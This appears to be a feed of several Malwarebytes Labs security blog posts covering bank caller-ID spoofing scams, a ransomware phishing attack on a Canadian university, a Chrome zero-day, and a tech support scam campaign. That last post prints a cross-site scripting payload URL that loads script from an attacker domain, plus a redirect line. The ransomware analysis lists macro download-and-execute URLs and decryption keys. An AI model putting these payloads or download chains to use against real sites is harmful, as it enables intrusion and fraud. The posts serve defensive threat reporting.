IT NEWS

It can be a very convincing trick…

“You can check the number in your display online sir. You’ll see I’m really calling from your bank.”

That is, of course, if you are unaware that phone numbers can be spoofed. Then again, they wouldn’t be successful scammers if they weren’t convincing. If you suggest calling them back, they’ll tell you it’s impossible to call their extension directly and you would have to go through the operator in the head office. Which could take a while and because of the urgency that is not really an option now, is it?

What is spoofing?

The definition of spoofing is: to display characteristics that do not belong to you, in order to assume a false identity. We’ve talked about email spoofing in the past, but in this case we’re talking about caller ID spoofing. Caller ID spoofing is when someone calling your phone deliberately falsifies the information transmitted to your caller ID display to disguise their identity.

Normally your display indicates the phone number and name associated with the line used to call you. But there are services that allow you to display any spoofed caller ID. Some Voice over IP (VoIP) providers simply allow the user to configure their displayed number as part of the configuration page on the provider’s web interface.

How does this scam pan out?

The scammer calls the victim while spoofing a phone number that belongs to the bank. And the scammer comes prepared with enough knowledge about the victim’s bank account to take away the last shreds of doubt. They tell the victim that they have noticed unusual activity on the victim’s bank account and urgently advise them to put their money in a different account.

If the victim indicates that they only have the one account, the scammer offers them a so-called “vault account” of the bank. The scammer explains that such an account is a safe place for their funds. Their money may be unavailable in such an account for a few days, but that is better than getting robbed blind isn’t it? If the victim starts asking a lot of questions, the scammer will say that there is no time to waste because of the danger of losing everything to an unknown entity. Of course, the “vault account” belongs to the scammer and the whole theatrics are designed to get the victim to transfer their belongings into that account.

Extra information from phishing

What makes this extra successful is that the scammers really come to the call prepared. They can tell you how much you have in your account and who received your latest payments. There are a few theories about how the scammers can obtain that information. Some even go as far to claim that they must have someone on the inside. This would explain a lot, but some victims admitted having received a phishing mail not too far before the call.

If the victims have clicked the link in that mail and have logged in to the phisher’s fake bank website, this not only explains how the scammers obtained the information, it also adds credibility to the story of the scammer on the phone. After all, the phishing attempt could have resulted in unauthorized access. What gives the “insider” scenario some extra credibility is the fact that some victims had recently raised their transaction limits because they needed to make some large payments.

Phishing sites mirror the bank site, and the phisher can follow the input of the victim into the real bank site. This allows them to have a look at the account details after getting logged in and equips them with the information they can use during the phone call.

Banking security measures

If the information the scammer has about the victim’s account stems from a phishing attempt and the bank uses a 2FA login method, then the login information will grow stale rather quickly. A successful phish allows the scammer to log in, but usually only once. They can look around and gather intel to prepare their call. Any subsequent action like making a payment or changing the 2FA settings would have to be authorized separately, and such a request would likely make the victim suspicious.

What investigators from a Dutch consumer television show found out is that some banks are more likely than others to be targeted. The investigators suspect that customers of banks that use a card reader to scan QR codes to authorize logins and payments are less vulnerable than those that send text messages. This could be because it is more difficult to mimic the QR codes on the bank phishing site than it is to create an input field for the verification code.

Another fail-safe that the scammer will try to circumvent, if necessary, are the transaction limits that are in place by default for some banks. These are often limited to rather small amounts and customers will have to raise the limit if they want to make larger payments. When the bank asks you to raise this limit instead of the other way around that should be a red flag. Remember that they can do it for you in case of a real emergency.

The aftermath of a spoofing attack

The scammers will try and make sure that the victim will not immediately realize that they have been had, so the scammers can make the money disappear from the target account in order to stop the payments being reversed.

With some banks you will have insurance against banking fraud, but other banks will say the victim transferred the funds themselves and will accept no responsibility for the loss. In most countries you are protected by law against fraudulent payments under certain conditions. One of these conditions can generally be described as “the customer should not be careless”, and a customer could be seen as careless if they gave away their login credentials. Whether entering those credentials on a bank phishing site that looks exactly like the one that belongs to the bank is a careless act is up for debate it seems.

So, in a worst case scenario you would not only feel embarrassed because you fell for the scam, you could also be labelled careless and lose the money in your account.

The future of caller ID spoofing

Caller ID spoofing has been causing problems since 2004 when a service was opened to allow spoofed calls to be placed from a web interface. In 2018, we mentioned one method of caller ID spoofing called “neighbor spoofing”. Neighbor spoofing was a popular method among cold callers using the same area code and telephone prefix of the person being called. Caller ID spoofing is generally legal in the United States unless done “with the intent to defraud, cause harm, or wrongfully obtain anything of value”. In 2019 the TRACED Act, the first federal law designed to curb unwanted robocalls was signed.

SEC. 7. PROTECTIONS FROM SPOOFED CALLS.

IN GENERAL.—Not later than 1 year after the date of the enactment of this Act, and consistent with the call authentication frameworks under section 4, the Com15 mission shall initiate a rulemaking to help protect a subscriber from receiving unwanted calls or text messages from a caller using an unauthenticated number.

Stirred, not shaken

One helpful tool in setting up such protection is the STIR/SHAKEN framework which is a caller ID authentication and verification measure. STIR and SHAKEN are acronyms for the Secure Telephone Identity Revisited (STIR) and Signature-based Handling of Asserted Information Using toKENs (SHAKEN) standards. STIR/SHAKEN digitally validates the handoff of phone calls passing through the complex web of networks, allowing the phone company of the consumer receiving the call to verify that a call is in fact from the number displayed on Caller ID. The Federal Communications Commission (FCC) is leading the push for industry adoption of these standards to help consumers as quickly as possible.

If and when other countries decide to do more than just make caller ID spoofing illegal, preferably by implementing and adhering to the STIR/SHAKEN framework, this will make consumers around the world just that bit safer and make the scam we discussed a lot harder to pull off.

In the meanwhile, stay safe everyone!

The post Scammers are spoofing bank phone numbers to rob victims appeared first on Malwarebytes Labs.

This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.

In recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.

However, this attack and motives are different than the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims to recover their encrypted files.

On discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.

Mandatory COVID-19 survey distributed to targeted recipients

The attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto Box and DropBox and used the share functionality from these platforms to distribute it.

This was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from file sharing services without creating a number of false positives.

The attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):

Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more. Please fill it out ASAP!

You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity! In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!

According to UBC, less than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file since it was shared privately, instead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target organization to already be using one of these two sharing services.

Phishing document analysis

The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).

When the macro is executed, it does the following:

• Gets the %APPDATA% directory
• Creates the Byxor directory in %APPDATA%
• Downloads a file from the following url and writes it as Polisen.exe
• notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
• Downloads a file from the following url and writes it as Killar.exe
• notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
• Calls shell function to execute killar.exe
• Checks the output of shell function and whether it was successful (return value would be task Id of executed application)
  • If successful, it sends a GET http request to:
    canarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
  • If it isn’t successful, it sends a GET http request to:
    canarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted for a particular event.

This can be very useful as an early warning notification system that an intruder has had access to a network. In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.

Vaggen ransomware

After being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as ‘main_main’.

Other functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.

main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRename
main_FOLOJVAG -> main_runCommands
main_DUVETVAD -> main_dropFile
main_HIDDENBERRIES -> main_xteaDecryptAndWriteToFile

A full list of the functions, along with their RVAs can be found here.

Some of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of XXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.

Encrypting and renaming of the files is deployed as the callback of the standard Golang function: path.filepath.Walk.

Files are encrypted with AES-256 (32 byte long key) in GCM mode.

The encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce, generated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.

The content of the output file (with .VAGGEN extension) contains:

• the 12 bytes long nonce
• the encrypted content
• the 16 byte long GCM Tag

The hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content.

With all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.

Unusually low ransom amount

Based on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easy.

However, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.

Crawling additional repositories created by the threat actor, we found other Word template files that have used a very similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing attack.

We are grateful for the information shared with us by the University of British Columbia. This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.

IOCs

Ransomware variants:

Variant1:
summerofficetemplate.dotm
634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant2:
UBC-COVID19-Survey-Mandatory.docx
e869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3
template.dotm
334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
polisen.exe
03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf
killar.exe
43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f

Variant3:
template1.dotm
225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4
notabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe
notabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe
canarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php
canarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp

Variant4:
smoothtemplates.dotm
ada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
b4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant5:
template.dotm:
7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe
canarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp
canarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php
mrmonster.exe
f42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23
mrclean.exe
71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a

The post Fake COVID-19 survey hides ransomware in Canadian university attack appeared first on Malwarebytes Labs.

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to Jamie Court, president of the non-profit advocacy group Consumer Watchdog, about the consumer value in Cybersecurity Awareness Month.

Launched initially as a joint effort between government and industry, this once-a-year awareness campaign is meant to give the American public simple tips to stay cybersecure, almost like a modern version of telling folks to replace the batteries in their smoke alarms.

Over time, participation in Cybersecurity Awareness Month has grown. Every October, employers now roll out renewed cybersecurity trainings for employees. Maybe, this month, your employer has deployed a phishing email test. Maybe they’ve developed a training session on two factor authentication. Or maybe you’ve gone through exercises about creating strong passwords.

But what about all the consumers out there who don’t work for an employer that takes Cybersecurity Awareness Month seriously? Where is the value in this month for them?

Tune in to hear about the consumer value of Cybersecurity Awareness Month, including who is going to bat for the consumer, what kind of information gets released every year, and what consumers should know about, specifically, smart cars on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, Google Play Music, and Spotify, plus whatever preferred podcast platform you use.

We cover our own research on:

• Brute force attacks, the many ways of doing it, and how users can protect themselves from it.
• Tech support scammers (TSS) were found exploiting cross-site scripting (XSS) vulnerabilities to make their targets believe they’re legitimate until a browser locker is triggered.
• MSPs and the importance of cybersecurity integration.

Other cybersecurity news:

• US intelligence officials have pinned Iran as the culprit behind threatening emails sent to voters. (Source: AP News)
• Pharmaceutical giant Pfizer has suffered a huge data breach after exposing client data in unprotected Google Cloud bucket. (Source: Threatpost)
• CrowdStrike claims that China is behind attacks against COVID-19 vaccine laboratories in Japan. (Source: Emergency Live)
• Security researchers from Sensity found a “deepfake ecosystem” within the Telegram messaging app network where bots generate fake nudes upon request. (Source: The Verge)
• The NSA has publicized a list of 25 vulnerabilities that hackers in China are looking to exploit. (Source: ZDNet)

Stay safe, everyone!

The post Lock and Code S1Ep18: Finding consumer value in Cybersecurity Awareness Month with Jamie Court appeared first on Malwarebytes Labs.

A ransomware gang has made headlines for donating a big chunk of stolen funds to two charities. Two separate donations given to Children International and The Water Project rang tills to the tune of $10,000 each. Their reason was that they’re targeting “only large profitable corporations, we think it’s fair that some of the money they’ve paid will go to charity. No matter how bad you think our work is, we are pleased to know that we helped change someone’s life.”

This has raised several questions outside the usual “Is it morally right to pay a ransom” debate. It’s a whole new world of “Is it morally acceptable for ransomware authors to donate ill-gotten gains to charities, Robin Hood style?”

“Steals from the rich, gives to the poor?”

In theory it sounds sort of nice. As the malware slingers suggest, some good is coming from it somewhere along the line.

However, the reality outside the theory is rather different. Replace “stolen funds donated from ransomware authors” with “stolen funds donated from criminal gangs”. It suddenly sounds a lot less abstract and cyberpunk and a lot more like somebody is going to jail.

This isn’t “just” a risk to charities, either – any organisation could get into trouble from similar dealings. If malware authors are splashing the cash, it’s a danger to everyone. People and organisations drop links to their Venmo accounts, or their tip jars, all the time. With so many ways to donate, it’s never been more difficult to ensure your funding is legit. Phone, text, online, money in an envelope. Perhaps from your own country, or international donations, a speedy online processor, or even Bitcoin. The possibilities are endless.

When the Robin Hood mindset spreads…

Are the ransomware authors genuine in their desire to help people less fortunate than themselves? Or is it a bad cover story to justify breaking into servers and make off with some cash? It doesn’t help the recipients at all. We’re talking serious ramifications for the charity trustees with potential criminal charges waiting in the wings. The charity itself could suddenly discover it sits on very perilous ground indeed.

There are few things more damaging to a business than losing trust from the general public. That’s especially the case where your business model is asking them for money.

If stolen cash donations to assuage guilt takes hold, we could find ransomware authors passing cash outside the charity realm. Is your business an SME with no chance of going head to head with the big players? No worries, your friendly neighbourhood ransomware author is here to help. Perhaps they start playing favourites. Suddenly, the boss of that struggling firm is now asking the ransomware authors for a cut.

In a few short steps, we’re moving from “Giving some money to charities is okay even if it’s stolen because they need it” to “Oh no, Uncle Paul’s set up a money laundering syndicate and he’s supposed to be selling fax machines”.

Many pieces of advice for UK charities are good suggestions for businesses generally. To steer clear of dubious payments, you could stand to pick up a few tips from their selection of guidance. By showing how regulated funds are in the charity industry, you’ll see how serious it is everywhere else as well.

Charitable basics

In the UK, the Charity Commision is a non-ministerial Government department. Those departments typically make things work by regulation, theoretically free of politicisation. Government with a small “g”, perhaps.

They regulate charities in England and Wales, advise on scams, provide a list of registered charities, and much more. They also provide a significant volume of advice on ensuring charity activities are above board. There’s lots of ways your charity (and, by extension, unrelated business) can get into trouble where bogus donations are concerned.

Remember what I said about ransomware Robin Hood donations spreading from charities to lots of other donation/tipping mechanisms? It’s time to take a trip to the cleaners, because money laundering is the big threat here. It means little whether it’s done via traditional means or malware shenanigans.

Laundering for fun and profit

“Laundering” cash means taking unclean, dirty money and rinsing the badness out. If I turn up at the bank with a mysterious haul of one million dollars, it’s going to look odd. If I scatter it across multiple banks, it looks much better. Coming up with ways to ensure the banks can’t spot all the bills came from heist X or Y, evading whatever technology/system is in place, is where we’re cooking with gas.

There are all sorts of laundering techniques, and all businesses need to be careful. Charities are particularly at risk, because they’re essentially a large bowl with a “please deposit money” sign above it. If you’re an individual with a Gofundme, do you know where all your donations are coming from? That everyone donating is legit? Of course you don’t. Now consider that you’re a large, international organisation with many ways to donate. Consider your daily transaction volumes. Your own business almost certainly has the same problems facing it, even if you haven’t considered until now in terms quite so stark. Scary, right?

Ransomware authors are potentially doing the charities a favour by being vocal. Otherwise, they’d have ten grand rattling around in their coffers sourced from an unwilling company struck by a criminal attack.

“That’s not laundering though, is it?”

Not yet, but giving the money to a charity could be the first step. Money doesn’t have to go to banks. It can be dropped into shell organisations, thrown into the gambling area, placed into businesses known as “fronts”. You could also give it to a legitimate charity, who receives large donations regularly, and then try to reclaim the cash. Perhaps the fraudsters begin a phishing campaign for financial details and the cycle begins again.

Maybe they have someone working on the inside at their chosen charity, or (worse) perhaps the charity itself is bogus. They could even claim they’d donated too much money, or the entire donation was an accident and would like their money back.

However you stack it up, this should be a major concern for any organisation. Normalising the movement of stolen money can only end poorly.

Freedom fighter or terrorist?

Even without the laundering aspect, simply receiving money from a malware group with ties to terrorism will likely end up being disastrous. To stress how serious this is [PDF], involvement in laundering in the UK is an offence prohibited under various Acts of Parliament and terrorism is also a massive no-no [PDF, Page 15]:

• Proceeds of Crime Act 2002
• Terrorism act 2000
• Anti-Terrorist crime and security act 2001
• Counter-Terrorism Act 2008

You don’t need to be a charity to want to avoid getting caught up in one of those potential headaches.

Strategies for dealing with fraud and financial crime

The previously mentioned Charity Commision documents for dealing with monetary fraud [PDF] are, as has been mentioned, very good [PDF] and almost certainly usable at your current organisation. In no particular order, here are some of the best. Regular readers will note many of these are staple pieces of advice on the Labs Blog, and there are many more on the linked documents. Not all of them will be applicable to your business, but they’re good things to keep in mind.

1. Design appropriate internal financial controls, ensuring funds are properly accounted for, based on risks related to type, size, and activities.
2. Perform regular audits of security protocols, make multiple people responsible for various stages of fund transfers/authorisation, and deploy 2FA for online components.
3. Keep financial records for receipt/use of funds, check and verify both domestic and international transactions.
4. Never pre-sign blank cheques, it’s a clear in-road to fraud.
5. Consider what level of due diligence, monitoring, and verification of use of funds if required to meet your legal duties regarding safe flow of funds.

There’s also guidance on moving/receiving funds internationally [PDF] with useful information on types of banking, transfer, how to report incidents, and a checklist of potential concerns [PDF] when receiving money from overseas. Given the likelihood of ransomware authors donating from a country outside of your own, these are useful things to be aware of. Many online payment processors will flag potential fraud without you having to do anything, and it’s worth digging into the nitty-gritty before signing up to a merchant system.

A deal you’ll want no part of

As you may have gathered, one of the biggest issues here is that of the insider threat. Whether you’re a charity or a seller of hardware and software, the danger inside your walls can be fatal. Security is a multi-layered entity. Checks and balances required at digital, financial, and real-world levels keep things running smoothly. That’s why we have to do things like lock down printers, or restrict access to papers used for money transfers, or secure fax machines behind ID accessed security doors.

There’s always another problem to consider and then address, and securing your real world assets is just as crucial as your online security. When ransomware authors shift parts of their model from online to off, so too do we need to think about more ways to keep ourselves out of harm’s way.

In my opinion, there’s nothing helpful about handing stolen money to charities or anyone else. The moral arguments which exist are eclipsed by the legal ramifications. Malware authors are better served “helping” organisations by keeping their profits far, far away from legitimate businesses.

The post Keeping ransomware cash away from your business appeared first on Malwarebytes Labs.

Google has recently released Chrome version 86.0.4240.111 to patch several holes. One is for a zero-day flaw – that means a vulnerability that is being actively exploited in the wild.

The flaw, which is officially designated as CVE-2020-15999, occurs in the way FreeType handles PNG images embedded in fonts using the Load_SBit_Png function. FreeType is a popular text rendering library that Chrome uses. According to the bug report filed by Sergei Glazunov, a security researcher from Google’s very own Project Zero team, the function has the following tasks:

1) Obtains the image width and height from the header as 32-bit integers.
2) Truncates the obtained values to 16 bit and stores them in a ‘TT_SBit_Metrics’ structure.
3) Uses the truncated values to calculate the bitmap size.
4) Allocates the backing store of that size. 5) Passes ‘png_struct’ and the backing store to a libpng function.

Glazunov further explains that since the libpng function uses 32-bit values instead of the truncated 16-bit values, a heap buffer overflow in FreeType could occur if the PNG’s width and/or height exceeds 65535, the highest possible allocated buffer or memory for this type of data. This would result in certain pieces of data being overwritten or corrupted and, overall, the program behaving differently. So, anyone who successfully exploits this bug could either allow remote execution of malicious code in the context of the browser or a complete compromise of the affected system.

Google didn’t further elaborate on how CVE-2020-15999 is being exploited to target its users, or who is possibly behind the exploitation.

Update your Chrome now

Chrome users are advised to update to the current browser version, 86.0.4240.111, to protect themselves from getting exploited. Development teams who use the same FreeType libraries should update to FreeType 2.10.4.

The post Google patches actively exploited zero-day bug that affects Chrome users appeared first on Malwarebytes Labs.

For modern Managed Service Providers (MSPs), gone are the days of disparate workflows, and that’s really for the best.

Imagine trying to run a successful MSP business today—finding potential customers, procuring new clients, developing purchase orders, managing endpoints, and sending invoices—all without the help of Remote Monitoring and Management (RMM) and Professional Services Automation (PSA) tools. It would be ludicrous.

Why then should MSPs accept that another critical part of their daily workload does not integrate with their current product workstack—cybersecurity?

The short answer is they shouldn’t. With an increasingly complex threat landscape which includes evolving ransomware strategies and trickier phishing scams, MSPs need to be on their A-game. Further, as Malwarebytes Labs showed, medium-sized and enterprise businesses suffered dramatic hits to their cybersecurity postures due to the coronavirus pandemic, and the small businesses that many MSPs protect are likely suffering similar pains. 

The very nature of the MSP business demands integration. MSPs should ask the same from their cybersecurity solutions, allowing them to streamline their endpoint security practice with automated endpoint detection and deployment, advanced remediation, and simplified administration.

Why integration helps MSPs and their clients

MSPs today have likely been bombarded by the same arguments favoring RMM and PSA software—these products save time and make money. RMM tools mean no more driving to a physical site, no more scheduled check-ins where a client may have zero IT issues or a critical IT issue that only drags a team down for the rest of the day, and no more unreliability. Remotely addressing a client’s needs is a necessary component of today’s workload.

PSAs offer similar benefits in different areas. These tools can take disparate data flows and collate them into one source of truth. They can automate the generation and hand-off of data to prevent any human error from, for instance, an MSP’s marketing team to its sales team. These tools can also take vital billing data and transform it into trustworthy invoices, making sure that the countless hours of hard work get counted. And they can document purchase orders and make them easily accessible to every MSP employee that needs them. These tools can, in effect, remove the silos of chaos.

These benefits are obvious, and they help not just MSPs, but the clients that MSPs protect.

Being able to immediately field an IT request ticket from a client helps that client, increases their satisfaction, and lets them get back to their job more quickly. Automatically compiling service agreements for multiple clients means fewer opportunities for lost details or mistakes.

These things just make sense. But for MSPs, one of the most crucial roles they perform for clients can sometimes fall beyond the scope of most PSAs. That’s cybersecurity.

Benefits of cybersecurity integration

Every expert MSP knows that their job is more than just fixing IT issues as they happen. It’s also helping clients prevent computer issues before they can have a chance to occur. This doesn’t just help the clients, either, but it helps the many MSP tech workers already slammed with daily requests.

For an MSP, the more endpoints it manages that are already protected with a strong cybersecurity solution, the more endpoints that MSP won’t have to worry about, which means the more time that employees can devote full, personalized attention to the clients suffering other computer issues.

Unfortunately, while RMM and PSA tools have been the standard for decades, the integration with cybersecurity software into these tools is more recent. For years now, MSPs have been forced to sometimes go back to the disparate setups that their industry helped solve—logging into multiple applications to manage the same endpoint.

It didn’t make sense more than 10 years ago and it doesn’t make sense today.

MSPs should consider cybersecurity solutions that integrate directly with their PSA and RMM tools to prevent this repeated splintering of a workload.

Further, having an integrated cybersecurity solution can help an MSP better protect its clients. The integration will allow an MSP to more easily recommend that cybersecurity solution for clients when drafting up service agreements, and a protected client is just as important for the client as it is for the MSP helping them.

After all, so much of the job is cybersecurity, and that means protecting an endpoint before an attack hits, not just after.

The right, always-on, integrated cybersecurity solution will protect clients and their endpoints from disruptive ransomware attacks, sneaky phishing scams, unsafe websites injected with harmful code like credit card skimmers, and dangerous attachments sent through malicious emails. And when something does sneak through? MSPs can then easily rely on their RMM and PSA platforms to get a master-level view of what’s gone wrong, addressing and fixing the issue without having to navigate separate applications with potentially different logins, user interfaces, and data export settings.

There’s no reason to go back to disparate workflows. The MSP industry has been there, and it’s rightfully moved beyond it.

It should do the same when picking a cybersecurity solution for both itself and its clients.

The post The value of cybersecurity integration for MSPs appeared first on Malwarebytes Labs.

Tech support browser lockers continue to be one of the most common web threats. Not only are they a problem for end users who might end up on the phone with scammers defrauding them of hundreds of dollars, they’ve also caused quite the headache for browser vendors to fix.

Browser lockers are only one element of a bigger plan to redirect traffic from certain sites, typically via malvertising chains from adult portals or sites that offer pirated content.

There’s a slightly different campaign that we’ve been tracking for several weeks due to its high volume. Threat actors are relying on Facebook to distribute malicious links that ultimately redirect to a browser locker page. Their approach is interesting because it involves a few layers of deception including abusing a cross-site scripting vulnerability (XSS) on a popular website.

Malicious links shared via Facebook

Links posted onto social media platforms should always be scrutinized as they are a commonly abused way for scammers and malware authors to redirect users onto undesirable content. For this reason, you might see a disclaimer when you click on a link, warning you that it could be spam or dangerous.

The campaign we looked at appears to exclusively use links posted on Facebook, which is fairly unusual considering that traditionally tech support scams are spread via malvertising. Facebook displays a warning for the user to confirm that they want to follow the link. In this case, the destination is further obscured by the fact that the link is a bit.ly shortened URL.

The threat actor is using the bit.ly URL shortener to craft the first stage of redirection. In total, we catalogued 50 different bit.ly links (see IOCs) over a 3 month period, suggesting that there is regular rotation to avoid blacklisting.

Although we do not know exactly how these links are being shared with Facebook users, we have some indication that certain games (i.e. apps on the Facebook site) may help to spread them. Because this is out of our reach, we have alerted Facebook in case it is able to identify the exact source.

Abuse of cross-site scripting vulnerability

The bit.ly URL triggers the second stage redirection that involves a Peruvian website (rpp[.]pe) which contains a cross-site scripting vulnerability (XSS) that allows for an open redirect. Threat actors love to abuse open redirects as it gives some legitimacy to the URL they send victims. In this instance, the news site is perfectly legitimate and draws over 23 million visits a month.

In this case, we can see that code is being passed into the URL in order to load external JavaScript code from buddhosi[.]com, a malicious domain controlled by the attackers.

rpp[.]pe/buscar?q=hoy%3Cscript%20src=%27https://buddhosi[.]com/210c/
?zg1lx5u0.js%27%3E%3C/script%3E&fbclid={removed}

The JavaScript in turn creates the redirection to the browlock landing page by using the replace() method:

top.location.replace('https://BernetteJudeTews[.]club/home/anette/?
nr=855-472-1832&'+window.location.search.substring(1));

Besides redirecting users to other sites, an attacker could exploit the XSS to rewrite the current page into anything they like.

We reported this issue to Grupo RPP but have not heard back at the time of publication.

Cloaking domains

The open redirect trick is something that was added later on in the campaign. Originally the threat actors were directly loading decoy cloaking domains. Their purpose is to check incoming traffic and only serve the malicious content to legitimate victims. This is a very common practice and we’ve seen this before, for example with fake recipe sites.

We documented 6 domains involved in this third stage of the redirection process:

buddhosi[.]com
joinspinclass[.]com
suddhosi[.]com
thourwiringus[.]com
totalgodin[.]com
tuoliushigao[.]com

Server-side checks ensure visitors meet the requirements, namely a legitimate US residential IP address, and custom JavaScript is then served (an empty JavaScript is returned for non-interesting traffic).

The code (shared above) loads the browser locker landing page to one of the disposable and randomly-named domains using one of the newer TLDs:

.casa
.site
.space
.club
.icu
.bar

We collected close to 500 such domains (see IOCs) during a period of a few months, but there are likely many more.

Browser locker at the end of the chain

The browser locker fingerprints the user to display the appropriate version for their browser. It shows an animation mimicking a scan of current system files and threatens to delete the hard drive after five minutes.

Of course this is all fake, but it’s convincing enough that some people will call the toll-free number for assistance. In all, we collected almost 40 different phone numbers (see IOCs) but this is not an exhaustive list.

This is where it ends for the traffic scheme, but where it truly begins for the tech support scam. We did not make contact with the call centre, but we know very well how this next part plays out.

Malwarebytes users were already protected against this browser locker, thanks to our Browser Guard web protection. We will continue to track and report this campaign.

Thanks to Marcelo Rivero for helping with the replay and Manuel Caballero for his insights on the XSS.

Indicators of Compromise

Bitly links

Cloaking domains

buddhosi[.]com
joinspinclass[.]com
suddhosi[.]com
thourwiringus[.]com
totalgodin[.]com
tuoliushigao[.]com

Browlock domains

Phone numbers

The post XSS to TSS: tech support scam campaign abuses cross-site scripting vulnerability appeared first on Malwarebytes Labs.

While leaving your back door open while you are working from home may be something you do without giving it a second thought, having unnecessary ports open on your computer is a security risk that is sometimes underestimated. That’s because an open port can be subject to brute force attacks.

What are brute force attacks?

